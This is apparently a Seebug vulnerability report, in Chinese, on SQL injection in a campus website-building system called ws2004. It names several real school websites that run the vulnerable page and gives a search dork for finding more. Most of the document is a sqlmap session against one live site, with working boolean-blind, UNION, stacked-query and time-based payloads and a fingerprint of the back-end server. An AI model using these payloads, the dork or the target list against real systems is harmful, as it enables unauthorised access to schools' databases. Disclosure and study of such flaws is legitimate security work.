某校园建站系统同一文件多处sql注入漏洞

2015-03-23T00:00:00
ID SSV:95852
Type seebug
Reporter Root
Modified 2015-03-23T00:00:00

Description

简要描述:

sql

详细说明:

使用量非常多 http://www.dlwsxx.com/ws2004/model/login1.asp http://www.fzjcxx.cn/ws2004/model/login1.asp http://www.nxyancgjzx.com/ws2004/model/login1.asp http://www.sgtjb.com/ws2004/model/login1.asp http://www.sdwhys.com/ws2004/model/login1.asp http://www.zjnksyzx.com:8801/ws2004/model/login1.asp 关键词:inurl:ws2004/Model/

http://www.fzjcxx.cn/ws2004/Model/default.asp?KeyWord=1&TemplateFunctionMode=32&TemplateFields=1&SearchType=0

``` [22:27:15] [WARNING] using 'C:\Users\Administrator.sqlmap\output' as the output directory [22:27:16] [INFO] testing connection to the target URL [22:27:16] [INFO] testing if the target URL is stable. This can take a couple of seconds [22:27:17] [INFO] target URL is stable [22:27:17] [INFO] testing if GET parameter 'KeyWord' is dynamic [22:27:17] [INFO] confirming that GET parameter 'KeyWord' is dynamic [22:27:17] [INFO] GET parameter 'KeyWord' is dynamic [22:27:17] [WARNING] heuristic (basic) test shows that GET parameter 'KeyWord' m ight not be injectable [22:27:17] [INFO] testing for SQL injection on GET parameter 'KeyWord' [22:27:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [22:27:19] [INFO] GET parameter 'KeyWord' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable [22:27:20] [INFO] heuristic (extended) test shows that the back-end DBMS could b e 'Microsoft SQL Server' do you want to include all tests for 'Microsoft SQL Server' extending provided l evel (1) and risk (1)? [Y/n] y [22:27:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [22:27:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [22:27:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause (IN)' [22:27:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace (integer column)' [22:27:49] [INFO] testing 'MySQL inline queries' [22:27:49] [INFO] testing 'PostgreSQL inline queries' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [22:27:49] [INFO] testing 'Oracle inline queries' [22:27:49] [INFO] testing 'SQLite inline queries' [22:27:49] [INFO] testing 'MySQL > 5.0.11 stacked queries' [22:27:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [22:28:50] [INFO] GET parameter 'KeyWord' seems to be 'Microsoft SQL Server/Syba se stacked queries' injectable [22:28:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [22:28:50] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query)' [22:28:51] [INFO] GET parameter 'KeyWord' seems to be 'Microsoft SQL Server/Syba se AND time-based blind (heavy query)' injectable [22:28:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [22:28:51] [INFO] automatically extending ranges for UNION query injection techn ique tests as there is at least one other (potential) technique found [22:28:51] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending t he range for current UNION query injection technique test [22:28:52] [INFO] target URL appears to have 2 columns in query [22:28:52] [WARNING] reflective value(s) found and filtering out [22:28:52] [WARNING] output with limited number of rows detected. Switching to p artial mode [22:28:52] [INFO] GET parameter 'KeyWord' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'KeyWord' is vulnerable. Do you want to keep testing the others (i f any)? [y/N] y [22:29:03] [INFO] testing if GET parameter 'TemplateFunctionMode' is dynamic [22:29:03] [INFO] confirming that GET parameter 'TemplateFunctionMode' is dynami c [22:29:03] [INFO] GET parameter 'TemplateFunctionMode' is dynamic [22:29:04] [WARNING] heuristic (basic) test shows that GET parameter 'TemplateFu nctionMode' might not be injectable [22:29:04] [INFO] testing for SQL injection on GET parameter 'TemplateFunctionMo de' [22:29:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [22:29:05] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par ameter replace (original value)' [22:29:06] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD ER BY clause' [22:29:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries' [22:29:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [22:29:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [22:29:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [22:29:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause (IN)' [22:29:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [22:29:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [22:29:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause' [22:29:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' [22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace' [22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace (integer column)' [22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY cl ause' [22:29:43] [INFO] testing 'MySQL inline queries' [22:29:44] [INFO] testing 'PostgreSQL inline queries' [22:29:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [22:29:44] [INFO] testing 'Oracle inline queries' [22:29:44] [INFO] testing 'SQLite inline queries' [22:29:44] [INFO] testing 'MySQL > 5.0.11 stacked queries' [22:29:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [22:29:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [22:29:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [22:29:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [22:29:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [22:29:48] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query)' [22:29:49] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query - comment)' [22:29:49] [INFO] testing 'Oracle AND time-based blind' [22:29:50] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav y query)' [22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame ter replace' [22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame ter replace (heavy queries)' [22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses' [22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)' [22:29:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' injection not exploitable with NULL values. Do you want to try with a random int eger value for option '--union-char'? [Y/n] y [22:29:55] [WARNING] if UNION based SQL injection is not detected, please consid er forcing the back-end DBMS (e.g. --dbms=mysql) [22:29:57] [INFO] testing 'Generic UNION query (43) - 1 to 10 columns' [22:29:59] [WARNING] GET parameter 'TemplateFunctionMode' is not injectable [22:29:59] [INFO] testing if GET parameter 'TemplateFields' is dynamic [22:30:00] [INFO] confirming that GET parameter 'TemplateFields' is dynamic [22:30:00] [INFO] GET parameter 'TemplateFields' is dynamic [22:30:00] [INFO] heuristic (basic) test shows that GET parameter 'TemplateField s' might be injectable [22:30:00] [INFO] testing for SQL injection on GET parameter 'TemplateFields' [22:30:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par ameter replace (original value)' [22:30:02] [INFO] GET parameter 'TemplateFields' seems to be 'Microsoft SQL Serv er/Sybase boolean-based blind - Parameter replace (original value)' injectable [22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause (IN)' [22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace (integer column)' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY cl ause' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query)' [22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query - comment)' [22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav y query)' [22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame ter replace' [22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame ter replace (heavy queries)' [22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses' [22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)' [22:30:05] [INFO] testing 'Generic UNION query (43) - 1 to 20 columns' [22:30:05] [INFO] checking if the injection point on GET parameter 'TemplateFiel ds' is a false positive GET parameter 'TemplateFields' is vulnerable. Do you want to keep testing the ot hers (if any)? [y/N] y [22:30:07] [INFO] testing if GET parameter 'SearchType' is dynamic [22:30:08] [WARNING] GET parameter 'SearchType' does not appear dynamic [22:30:08] [WARNING] heuristic (basic) test shows that GET parameter 'SearchType ' might not be injectable [22:30:08] [INFO] testing for SQL injection on GET parameter 'SearchType' [22:30:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [22:30:09] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par ameter replace (original value)' [22:30:09] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD ER BY clause' [22:30:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries' [22:30:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [22:30:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [22:30:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [22:30:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause (IN)' [22:30:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [22:30:15] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause' [22:30:15] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' [22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace' [22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r eplace (integer column)' [22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY cl ause' [22:30:16] [INFO] testing 'MySQL inline queries' [22:30:17] [INFO] testing 'PostgreSQL inline queries' [22:30:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [22:30:17] [INFO] testing 'Oracle inline queries' [22:30:17] [INFO] testing 'SQLite inline queries' [22:30:17] [INFO] testing 'MySQL > 5.0.11 stacked queries' [22:30:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [22:30:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [22:30:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [22:30:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [22:30:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [22:30:21] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query)' [22:30:22] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query - comment)' [22:30:22] [INFO] testing 'Oracle AND time-based blind' [22:30:23] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav y query)' [22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame ter replace' [22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame ter replace (heavy queries)' [22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses' [22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)' [22:30:24] [INFO] testing 'MySQL UNION query (43) - 1 to 10 columns' [22:30:27] [INFO] testing 'Generic UNION query (43) - 1 to 10 columns' [22:30:29] [WARNING] GET parameter 'SearchType' is not injectable sqlmap identified the following injection points with a total of 483 HTTP(s) req uests:


Place: GET Parameter: KeyWord Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: KeyWord=1' AND 8355=8355 AND 'pMth'='pMth&TemplateFunctionMode=32&T emplateFields=1&SearchType=0 Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: KeyWord=1' UNION ALL SELECT NULL,CHAR(113)+CHAR(121)+CHAR(120)+CHAR (120)+CHAR(113)+CHAR(84)+CHAR(115)+CHAR(100)+CHAR(109)+CHAR(90)+CHAR(83)+CHAR(99 )+CHAR(77)+CHAR(122)+CHAR(71)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)- - &TemplateFunctionMode=32&TemplateFields=1&SearchType=0 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: KeyWord=1'; WAITFOR DELAY '0:0:5'--&TemplateFunctionMode=32&Templat eFields=1&SearchType=0 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: KeyWord=1' AND 7937=(SELECT COUNT() FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sys users AS sys7) AND 'MUme'='MUme&TemplateFunctionMode=32&TemplateFields=1&SearchT ype=0 Place: GET Parameter: TemplateFields Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace ( original value) Payload: KeyWord=1&TemplateFunctionMode=32&TemplateFields=(SELECT (CASE WHEN (6562=6562) THEN 1 ELSE 6562(SELECT 6562 FROM master..sysdatabases) END))&Sear chType=0


there were multiple injection points, please select the one to use for following injections: [0] place: GET, parameter: KeyWord, type: Single quoted string (default) [1] place: GET, parameter: TemplateFields, type: Unescaped numeric [q] Quit > [22:30:32] [INFO] testing Microsoft SQL Server [22:30:32] [INFO] confirming Microsoft SQL Server [22:30:32] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [22:30:32] [INFO] fetched data logged to text files under 'C:\Users\Administrato r.sqlmap\output\www.fzjcxx.cn' [*] shutting down at 22:30:32 ```

漏洞证明: